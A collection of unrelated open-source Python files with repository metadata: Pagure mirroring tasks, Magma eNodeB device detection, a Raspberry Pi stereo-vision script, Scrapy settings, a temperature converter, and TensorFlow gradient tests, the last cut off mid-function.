873b1b00caf832b67f9261d076ec71e61a64c513
|
[
"MIT"
] | 81
|
2016-09-11T22:45:27.000Z
|
2022-02-22T15:12:21.000Z
|
library/tcl_procs/main.py
|
Cupidazul/ultide
|
6eac864540e19b23f30bd387310d09b84a3b1cf4
|
[
"MIT"
] | 2
|
2019-01-26T20:39:14.000Z
|
2020-08-01T13:14:19.000Z
|
library/tcl_procs/main.py
|
Cupidazul/ultide
|
6eac864540e19b23f30bd387310d09b84a3b1cf4
|
[
"MIT"
] | 34
|
2016-12-25T12:23:51.000Z
|
2021-06-11T10:12:57.000Z
|
import time
def on_demo_ping(data, response, session_data):
response['demo_response'] = 'Your message was "' + data['message'] + '". Time on server is: ' + str(time.time()) + '.'
| 45.75
| 122
| 0.655738
|
4a07cf2ed5de7eafb72da8c71569cb044f80ae51
| 8,431
|
py
|
Python
|
src/pagure/lib/tasks_mirror.py
|
yifengyou/learn-pagure
|
e54ba955368918c92ad2be6347b53bb2c24a228c
|
[
"Unlicense"
] | null | null | null |
src/pagure/lib/tasks_mirror.py
|
yifengyou/learn-pagure
|
e54ba955368918c92ad2be6347b53bb2c24a228c
|
[
"Unlicense"
] | null | null | null |
src/pagure/lib/tasks_mirror.py
|
yifengyou/learn-pagure
|
e54ba955368918c92ad2be6347b53bb2c24a228c
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
(c) 2018 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from __future__ import unicode_literals, absolute_import
import base64
import datetime
import logging
import os
import stat
import struct
import six
import werkzeug.utils
from celery import Celery
from cryptography import utils
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import pagure.lib.query
from pagure.config import config as pagure_config
from pagure.lib.tasks_utils import pagure_task
from pagure.utils import ssh_urlpattern
# logging.config.dictConfig(pagure_config.get('LOGGING') or {'version': 1})
_log = logging.getLogger(__name__)
if os.environ.get("PAGURE_BROKER_URL"): # pragma: no-cover
broker_url = os.environ["PAGURE_BROKER_URL"]
elif pagure_config.get("BROKER_URL"):
broker_url = pagure_config["BROKER_URL"]
else:
broker_url = "redis://%s" % pagure_config["REDIS_HOST"]
conn = Celery("tasks_mirror", broker=broker_url, backend=broker_url)
conn.conf.update(pagure_config["CELERY_CONFIG"])
# Code from:
# https://github.com/pyca/cryptography/blob/6b08aba7f1eb296461528328a3c9871fa7594fc4/src/cryptography/hazmat/primitives/serialization.py#L161
# Taken from upstream cryptography since the version we have is too old
# and doesn't have this code (yet)
def _ssh_write_string(data):
return struct.pack(">I", len(data)) + data
def _ssh_write_mpint(value):
data = utils.int_to_bytes(value)
if six.indexbytes(data, 0) & 0x80:
data = b"\x00" + data
return _ssh_write_string(data)
# Code from _openssh_public_key_bytes at:
# https://github.com/pyca/cryptography/tree/6b08aba7f1eb296461528328a3c9871fa7594fc4/src/cryptography/hazmat/backends/openssl#L1616
# Taken from upstream cryptography since the version we have is too old
# and doesn't have this code (yet)
def _serialize_public_ssh_key(key):
if isinstance(key, rsa.RSAPublicKey):
public_numbers = key.public_numbers()
return b"ssh-rsa " + base64.b64encode(
_ssh_write_string(b"ssh-rsa")
+ _ssh_write_mpint(public_numbers.e)
+ _ssh_write_mpint(public_numbers.n)
)
else:
# Since we only write RSA keys, drop the other serializations
return
def _create_ssh_key(keyfile):
"""Create the public and private ssh keys.
The specified file name will be the private key and the public one will
be in a similar file name ending with a '.pub'.
"""
private_key = rsa.generate_private_key(
public_exponent=65537, key_size=4096, backend=default_backend()
)
private_pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
)
with os.fdopen(
os.open(keyfile, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600), "wb"
) as stream:
stream.write(private_pem)
public_key = private_key.public_key()
public_pem = _serialize_public_ssh_key(public_key)
if public_pem:
with open(keyfile + ".pub", "wb") as stream:
stream.write(public_pem)
@conn.task(queue=pagure_config["MIRRORING_QUEUE"], bind=True)
@pagure_task
def setup_mirroring(self, session, username, namespace, name):
"""Setup the specified project for mirroring."""
plugin = pagure.lib.plugins.get_plugin("Mirroring")
plugin.db_object()
project = pagure.lib.query._get_project(
session, namespace=namespace, name=name, user=username
)
public_key_name = werkzeug.utils.secure_filename(project.fullname)
ssh_folder = pagure_config["MIRROR_SSHKEYS_FOLDER"]
if not os.path.exists(ssh_folder):
os.makedirs(ssh_folder, mode=0o700)
else:
if os.path.islink(ssh_folder):
raise pagure.exceptions.PagureException("SSH folder is a link")
folder_stat = os.stat(ssh_folder)
filemode = stat.S_IMODE(folder_stat.st_mode)
if filemode != int("0700", 8):
raise pagure.exceptions.PagureException(
"SSH folder had invalid permissions"
)
if (
folder_stat.st_uid != os.getuid()
or folder_stat.st_gid != os.getgid()
):
raise pagure.exceptions.PagureException(
"SSH folder does not belong to the user or group running "
"this task"
)
public_key_file = os.path.join(ssh_folder, "%s.pub" % public_key_name)
_log.info("Public key of interest: %s", public_key_file)
if os.path.exists(public_key_file):
raise pagure.exceptions.PagureException("SSH key already exists")
_log.info("Creating public key")
_create_ssh_key(os.path.join(ssh_folder, public_key_name))
with open(public_key_file) as stream:
public_key = stream.read()
if project.mirror_hook.public_key != public_key:
_log.info("Updating information in the DB")
project.mirror_hook.public_key = public_key
session.add(project.mirror_hook)
session.commit()
@conn.task(queue=pagure_config["MIRRORING_QUEUE"], bind=True)
@pagure_task
def teardown_mirroring(self, session, username, namespace, name):
"""Stop the mirroring of the specified project."""
plugin = pagure.lib.plugins.get_plugin("Mirroring")
plugin.db_object()
project = pagure.lib.query._get_project(
session, namespace=namespace, name=name, user=username
)
ssh_folder = pagure_config["MIRROR_SSHKEYS_FOLDER"]
public_key_name = werkzeug.utils.secure_filename(project.fullname)
private_key_file = os.path.join(ssh_folder, public_key_name)
public_key_file = os.path.join(ssh_folder, "%s.pub" % public_key_name)
if os.path.exists(private_key_file):
os.unlink(private_key_file)
if os.path.exists(public_key_file):
os.unlink(public_key_file)
project.mirror_hook.public_key = None
session.add(project.mirror_hook)
session.commit()
@conn.task(queue=pagure_config["MIRRORING_QUEUE"], bind=True)
@pagure_task
def mirror_project(self, session, username, namespace, name):
"""Does the actual mirroring of the specified project."""
plugin = pagure.lib.plugins.get_plugin("Mirroring")
plugin.db_object()
project = pagure.lib.query._get_project(
session, namespace=namespace, name=name, user=username
)
repofolder = pagure_config["GIT_FOLDER"]
repopath = os.path.join(repofolder, project.path)
if not os.path.exists(repopath):
_log.warning("Git folder not found at: %s, bailing", repopath)
return
ssh_folder = pagure_config["MIRROR_SSHKEYS_FOLDER"]
public_key_name = werkzeug.utils.secure_filename(project.fullname)
private_key_file = os.path.join(ssh_folder, public_key_name)
if not os.path.exists(private_key_file):
_log.warning("No %s key found, bailing", private_key_file)
project.mirror_hook.last_log = "Private key not found on disk, bailing"
session.add(project.mirror_hook)
session.commit()
return
# Add the utility script allowing this feature to work on old(er) git.
here = os.path.join(os.path.dirname(os.path.abspath(__file__)))
script_file = os.path.join(here, "ssh_script.sh")
# Get the list of remotes
remotes = [
remote.strip()
for remote in project.mirror_hook.target.split("\n")
if project.mirror_hook
and remote.strip()
and ssh_urlpattern.match(remote.strip())
]
# Push
logs = []
for remote in remotes:
_log.info(
"Pushing to remote %s using key: %s", remote, private_key_file
)
(stdout, stderr) = pagure.lib.git.read_git_lines(
["push", "--mirror", remote],
abspath=repopath,
error=True,
env={"SSHKEY": private_key_file, "GIT_SSH": script_file},
)
log = "Output from the push (%s):\n stdout: %s\n stderr: %s" % (
datetime.datetime.utcnow().isoformat(),
stdout,
stderr,
)
logs.append(log)
if logs:
project.mirror_hook.last_log = "\n".join(logs)
session.add(project.mirror_hook)
session.commit()
_log.info("\n".join(logs))
| 33.062745
| 141
| 0.689717
|
4a07cf31d0d44829ed4d57c80790ad3980cdbc25
| 3,980
|
py
|
Python
|
lte/gateway/python/magma/enodebd/devices/device_utils.py
|
rdefosse/magma
|
d12ac827d0cdb39f499ce202e9e1196cc50b68d7
|
[
"BSD-3-Clause"
] | 1
|
2021-11-03T21:37:26.000Z
|
2021-11-03T21:37:26.000Z
|
lte/gateway/python/magma/enodebd/devices/device_utils.py
|
rdefosse/magma
|
d12ac827d0cdb39f499ce202e9e1196cc50b68d7
|
[
"BSD-3-Clause"
] | 36
|
2020-08-06T21:08:00.000Z
|
2021-05-21T05:51:23.000Z
|
lte/gateway/python/magma/enodebd/devices/device_utils.py
|
rdefosse/magma
|
d12ac827d0cdb39f499ce202e9e1196cc50b68d7
|
[
"BSD-3-Clause"
] | 1
|
2021-07-12T09:37:07.000Z
|
2021-07-12T09:37:07.000Z
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
from magma.enodebd.exceptions import UnrecognizedEnodebError
from magma.enodebd.logger import EnodebdLogger as logger
class EnodebDeviceName():
"""
This exists only to break a circular dependency. Otherwise there's no
point of having these names for the devices
"""
BAICELLS = 'Baicells'
BAICELLS_OLD = 'Baicells Old'
BAICELLS_QAFA = 'Baicells QAFA'
BAICELLS_QAFB = 'Baicells QAFB'
BAICELLS_RTS = 'Baicells RTS'
CAVIUM = 'Cavium'
def get_device_name(
device_oui: str,
sw_version: str,
) -> str:
"""
Use the manufacturer organization unique identifier read during INFORM
to select the TR data model used for configuration and status reports
Qualcomm-based Baicells eNodeBs use a TR098-based model different
from the Intel units. The software version on the Qualcomm models
also further limits the model usable by that device.
Args:
device_oui: string, OUI representing device vendor
sw_version: string, firmware version of eNodeB device
Returns:
DataModel
"""
if device_oui in {'34ED0B', '48BF74'}:
if sw_version.startswith('BaiBS_QAFB'):
return EnodebDeviceName.BAICELLS_QAFB
elif sw_version.startswith('BaiBS_QAFA'):
return EnodebDeviceName.BAICELLS_QAFA
elif sw_version.startswith('BaiStation_'):
# Note: to disable flag inversion completely (for all builds),
# set to BaiStation_V000R000C00B000SPC000
# Note: to force flag inversion always (for all builds),
# set to BaiStation_V999R999C99B999SPC999
invert_before_version = \
_parse_sw_version('BaiStation_V100R001C00B110SPC003')
if _parse_sw_version(sw_version) < invert_before_version:
return EnodebDeviceName.BAICELLS_OLD
return EnodebDeviceName.BAICELLS
elif sw_version.startswith('BaiBS_RTS_'):
return EnodebDeviceName.BAICELLS_RTS
elif sw_version.startswith('BaiBS_RTSH_'):
return EnodebDeviceName.BAICELLS_RTS
else:
raise UnrecognizedEnodebError(
"Device %s unsupported: Software (%s)"
% (device_oui, sw_version),
)
elif device_oui in {'000FB7', '744D28'}:
return EnodebDeviceName.CAVIUM
else:
raise UnrecognizedEnodebError("Device %s unsupported" % device_oui)
def _parse_sw_version(version_str):
"""
Parse SW version string.
Expects format: BaiStation_V100R001C00B110SPC003
For the above version string, returns: [100, 1, 0, 110, 3]
Note: trailing characters (for dev builds) are ignored. Null is returned
for version strings that don't match the above format.
"""
logger.debug('Got firmware version: %s', version_str)
version = re.findall(
r'BaiStation_V(\d{3})R(\d{3})C(\d{2})B(\d{3})SPC(\d{3})', version_str,
)
if not version:
return None
elif len(version) > 1:
logger.warning(
'SW version (%s) not formatted as expected',
version_str,
)
version_int = []
for num in version[0]:
try:
version_int.append(int(num))
except ValueError:
logger.warning(
'SW version (%s) not formatted as expected',
version_str,
)
return None
logger.debug('Parsed firmware version: %s', version_int)
return version_int
| 34.310345
| 78
| 0.668593
|
4a07d03fdb2dd4ebb408abd5d47a6f9ffbb7f1ce
| 2,663
|
py
|
Python
|
Raspberry/Stereo/StereoCamera.py
|
TUM-AERIUS/Aerius
|
be0ba4dd119b2ae1ba9fdea3a98d1757ef0d7e82
|
[
"MIT"
] | 6
|
2017-06-05T10:39:37.000Z
|
2018-05-07T12:03:04.000Z
|
Raspberry/Stereo/StereoCamera.py
|
TUM-AERIUS/Aerius
|
be0ba4dd119b2ae1ba9fdea3a98d1757ef0d7e82
|
[
"MIT"
] | 18
|
2017-07-08T21:04:48.000Z
|
2022-03-11T23:14:34.000Z
|
Raspberry/Stereo/StereoCamera.py
|
TUM-AERIUS/Aerius
|
be0ba4dd119b2ae1ba9fdea3a98d1757ef0d7e82
|
[
"MIT"
] | 1
|
2017-06-16T16:43:20.000Z
|
2017-06-16T16:43:20.000Z
|
from matplotlib import pyplot as plt
import numpy as np
import cv2
import socket
import struct
import io
import json
import os
import sys
# Useful references:
# http://docs.opencv.org/3.0-beta/modules/calib3d/doc/camera_calibration_and_3d_reconstruction.html#reprojectimageto3d
# use StereoMatcher::compute to get the disparity matrix
# get the the points in 3d space, needs disparity and other values we got from calibration
cameraDataFolder = "cameraData.json"
path_to_script = os.path.realpath(__file__)
parent_directory = os.path.dirname(path_to_script)
def getStereoImages(connection):
# Requesta new photo from the photo server
connection.write(struct.pack('<L', 1))
connection.flush()
# Get lengths
imageLeftLength = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
imageRightLength = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
# Get images
# https://picamera.readthedocs.io/en/release-1.10/recipes1.html
# streams are in jpeg format
# we have to reformat for openCV to be able to read them
imageLeftStream = io.BytesIO()
imageRightStream = io.BytesIO()
imageLeftStream.write(connection.read(imageLeftLength))
imageRightStream.write(connection.read(imageRightLength))
imageLeftStream.seek(0)
imageRightStream.seek(0)
# construct a numpy array from the stream
data = np.fromstring(imageLeftStream.getvalue(), dtype=np.uint8)
# "Decode" the image from the array, grayscale image
# bgr order
imageLeft = cv2.imdecode(data, 0)
data = np.fromstring(imageRightStream.getvalue(), dtype=np.uint8)
imageRight = cv2.imdecode(data, 0)
return imageLeft, imageRight
# start server for PhotoServer.py
photoSocket = socket.socket()
photoSocket.bind(('localhost', 8100))
photoSocket.listen(0)
photoConnection = photoSocket.accept()[0].makefile("rwb")
# Get calibration data from camerData.json
if os.path.isfile(os.path.join(parent_directory, cameraDataFolder)):
cameraData = json.loads(cameraDataFolder)
else:
print("No calibration data found")
sys.exit(0)
Q = np.array(cameraData["Q"])
window_size = 3
min_disp = 16
num_disp = 112-min_disp
stereo = cv2.StereoSGBM_create(minDisparity = min_disp,
numDisparities = num_disp,
blockSize = 16,
P1 = 8*3*window_size**2,
P2 = 32*3*window_size**2,
disp12MaxDiff = 1,
uniquenessRatio = 10,
speckleWindowSize = 100,
speckleRange = 32
)
while True:
img1, img2 = getStereoImages(photoConnection)
disparity = stereo.compute(img1, img2)
image3D = cv2.reprojectImageTo3D(disparity, Q)
plt.imshow(disparity, 'gray')
plt.show()
| 30.261364
| 118
| 0.732257
|
4a07d099ee3a16317f81e818608a893acb08fb39
| 1,482
|
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/app.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | 2
|
2019-12-10T03:08:09.000Z
|
2019-12-10T03:08:11.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/app.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/app.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | 1
|
2019-12-10T03:08:03.000Z
|
2019-12-10T03:08:03.000Z
|
"""
Create the application.
"""
import pkg_resources
from microcosm.api import create_object_graph
from microcosm.loaders import load_each, load_from_environ
from microcosm_connexion.resolver import MicrocosmResolver
from {{ cookiecutter.project_name }}.config import load_default_config
import {{ cookiecutter.project_name }}.controllers.pet # noqa
import {{ cookiecutter.project_name }}.stores.pet # noqa
def create_app(debug=False, testing=False, model_only=False):
"""
Create the object graph for the application.
"""
loader = load_each(
load_default_config,
load_from_environ,
)
graph = create_object_graph(
name=__name__.split(".")[0],
debug=debug,
testing=testing,
loader=loader,
)
graph.use(
"logging",
"postgres",
"sessionmaker",
"pet_store",
)
if not model_only:
graph.use(
"connexion",
"postgres_session_factory",
"configure_connexion_error_handler",
"pet_controller",
)
api_path = pkg_resources.resource_filename(__name__, "api/api.yml")
graph.connexion.add_api(api_path,
resolver=MicrocosmResolver(controller=graph.pet_controller, mark_transactional=True),
pythonic_params=True,
validate_responses=True,
)
return graph.lock()
| 27.444444
| 117
| 0.617409
|
4a07d10bcf59ec46014f0a66f7b548473a6e9a4a
| 3,202
|
py
|
Python
|
nuforc_reports/nuforc_reports/settings.py
|
internet-ufo-database/nuforc_sightings_data
|
cc1299b32e198dfa3c4428d3a3824925cd5dd1c2
|
[
"MIT"
] | null | null | null |
nuforc_reports/nuforc_reports/settings.py
|
internet-ufo-database/nuforc_sightings_data
|
cc1299b32e198dfa3c4428d3a3824925cd5dd1c2
|
[
"MIT"
] | null | null | null |
nuforc_reports/nuforc_reports/settings.py
|
internet-ufo-database/nuforc_sightings_data
|
cc1299b32e198dfa3c4428d3a3824925cd5dd1c2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Scrapy settings for nuforc_reports project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'nuforc_reports'
SPIDER_MODULES = ['nuforc_reports.spiders']
NEWSPIDER_MODULE = 'nuforc_reports.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'nuforc_reports (Internet UFO Database)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 0.10
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'nuforc_reports.middlewares.NuforcReportsSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'nuforc_reports.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'nuforc_reports.pipelines.NuforcReportsPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 35.186813
| 109
| 0.78326
|
4a07d1c108f493bec4c778931b0e32272b4e5794
| 267
|
py
|
Python
|
temperatureConversion.py
|
flyingsonu122/Python
|
f7649615882b77c8fdbd8dc20e954266ee8d1fc2
|
[
"MIT"
] | 1
|
2020-10-06T12:40:00.000Z
|
2020-10-06T12:40:00.000Z
|
temperatureConversion.py
|
flyingsonu122/Python
|
f7649615882b77c8fdbd8dc20e954266ee8d1fc2
|
[
"MIT"
] | null | null | null |
temperatureConversion.py
|
flyingsonu122/Python
|
f7649615882b77c8fdbd8dc20e954266ee8d1fc2
|
[
"MIT"
] | null | null | null |
fahrenheit = input('What is the temperature in Fahrenheit? ')
if fahrenheit.isnumeric() == False:
print('Input is not a number.')
exit()
fahrenheit = int(fahrenheit)
celsius = int((fahrenheit - 32) * 5/9)
print('Temperature in celsius is ' + str(celsius))
| 26.7
| 62
| 0.685393
|
4a07d2949a8ad44454ef4d4f15255a14a8f66734
| 26,559
|
py
|
Python
|
tensorflow/python/ops/math_grad_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/ops/math_grad_test.py
|
sagol/tensorflow
|
04f2870814d2773e09dcfa00cbe76a66a2c4de88
|
[
"Apache-2.0"
] | 203
|
2019-06-14T23:53:10.000Z
|
2022-02-10T02:27:23.000Z
|
tensorflow/python/ops/math_grad_test.py
|
sagol/tensorflow
|
04f2870814d2773e09dcfa00cbe76a66a2c4de88
|
[
"Apache-2.0"
] | 66
|
2020-05-15T10:05:12.000Z
|
2022-02-14T07:28:18.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Python ops defined in math_grad.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.debug.lib import check_numerics_callback
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradient_checker_v2
from tensorflow.python.ops import gradients
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class SquaredDifferenceOpTest(test.TestCase):
def _testGrad(self, left_shape, right_shape):
if len(left_shape) > len(right_shape):
output_shape = left_shape
else:
output_shape = right_shape
l = np.random.randn(*left_shape)
r = np.random.randn(*right_shape)
with self.cached_session(use_gpu=True):
left_tensor = constant_op.constant(l, shape=left_shape)
right_tensor = constant_op.constant(r, shape=right_shape)
output = math_ops.squared_difference(left_tensor, right_tensor)
left_err = gradient_checker.compute_gradient_error(
left_tensor, left_shape, output, output_shape, x_init_value=l)
right_err = gradient_checker.compute_gradient_error(
right_tensor, right_shape, output, output_shape, x_init_value=r)
self.assertLess(left_err, 1e-10)
self.assertLess(right_err, 1e-10)
@test_util.run_deprecated_v1
def testGrad(self):
self._testGrad([1, 2, 3, 2], [3, 2])
self._testGrad([2, 4], [3, 2, 4])
class AbsOpTest(test.TestCase):
def _biasedRandN(self, shape, bias=0.1, sigma=1.0):
"""Returns samples from a normal distribution shifted `bias` away from 0."""
value = np.random.randn(*shape) * sigma
return value + np.sign(value) * bias
def _testGrad(self, shape, dtype=None, max_error=None, bias=None, sigma=None):
np.random.seed(7)
if dtype in (dtypes.complex64, dtypes.complex128):
value = math_ops.complex(
self._biasedRandN(
shape, bias=bias, sigma=sigma),
self._biasedRandN(
shape, bias=bias, sigma=sigma))
else:
value = ops.convert_to_tensor(
self._biasedRandN(
shape, bias=bias), dtype=dtype)
with self.cached_session(use_gpu=True):
output = math_ops.abs(value)
error = gradient_checker.compute_gradient_error(
value, shape, output, output.get_shape().as_list())
self.assertLess(error, max_error)
@test_util.run_deprecated_v1
def testComplexAbs(self):
# Bias random test values away from zero to avoid numeric instabilities.
self._testGrad(
[3, 3], dtype=dtypes.float32, max_error=2e-5, bias=0.1, sigma=1.0)
self._testGrad(
[3, 3], dtype=dtypes.complex64, max_error=2e-5, bias=0.1, sigma=1.0)
# Ensure stability near the pole at zero.
self._testGrad(
[3, 3], dtype=dtypes.float32, max_error=100.0, bias=0.0, sigma=0.1)
self._testGrad(
[3, 3], dtype=dtypes.complex64, max_error=100.0, bias=0.0, sigma=0.1)
class MinOrMaxGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testMinGradient(self):
inputs = constant_op.constant([1.0], dtype=dtypes.float32)
outputs = math_ops.reduce_min(array_ops.concat([inputs, inputs], 0))
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [1], outputs, [])
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testMaxGradient(self):
inputs = constant_op.constant([1.0], dtype=dtypes.float32)
outputs = math_ops.reduce_max(array_ops.concat([inputs, inputs], 0))
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [1], outputs, [])
self.assertLess(error, 1e-4)
class MaximumOrMinimumGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testMaximumGradient(self):
inputs = constant_op.constant([1.0, 2.0, 3.0, 4.0], dtype=dtypes.float32)
outputs = math_ops.maximum(inputs, 3.0)
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [4], outputs, [4])
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testMinimumGradient(self):
inputs = constant_op.constant([1.0, 2.0, 3.0, 4.0], dtype=dtypes.float32)
outputs = math_ops.minimum(inputs, 2.0)
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [4], outputs, [4])
self.assertLess(error, 1e-4)
class ProdGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testProdGradient(self):
inputs = constant_op.constant([[1., 2.], [3., 4.]],
dtype=dtypes.float32)
outputs = math_ops.reduce_prod(inputs)
with self.cached_session():
error = gradient_checker.compute_gradient_error(
inputs, inputs.get_shape().as_list(),
outputs, outputs.get_shape().as_list())
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testProdGradientForNegativeAxis(self):
inputs = constant_op.constant([[1., 2.], [3., 4.]],
dtype=dtypes.float32)
outputs = math_ops.reduce_prod(inputs, -1)
with self.cached_session():
error = gradient_checker.compute_gradient_error(
inputs, inputs.get_shape().as_list(),
outputs, outputs.get_shape().as_list())
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testProdGradientComplex(self):
for dtype in dtypes.complex64, dtypes.complex128:
inputs = constant_op.constant([[1 + 3j, 2 - 1j], [3j, 4]],
dtype=dtype)
outputs = math_ops.reduce_prod(inputs)
with self.cached_session():
error = gradient_checker.compute_gradient_error(
inputs, inputs.get_shape().as_list(),
outputs, outputs.get_shape().as_list())
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testProdGradientForNegativeAxisComplex(self):
for dtype in dtypes.complex64, dtypes.complex128:
inputs = constant_op.constant([[1 + 3j, 2 - 1j], [3j, 4]],
dtype=dtype)
outputs = math_ops.reduce_prod(inputs, -1)
with self.cached_session():
error = gradient_checker.compute_gradient_error(
inputs, inputs.get_shape().as_list(),
outputs, outputs.get_shape().as_list())
self.assertLess(error, 1e-4)
@test_util.run_all_in_graph_and_eager_modes
class EuclideanNormGradientTest(test.TestCase):
def testBasic(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testNegative(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([-3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testKeepdims(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testGradientChain(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x) * 5, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testTwoElements(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3, -4], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testNegativeZero(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([1.0, -0.0], dtype=dtype)
with backprop.GradientTape() as tape:
tape.watch(x)
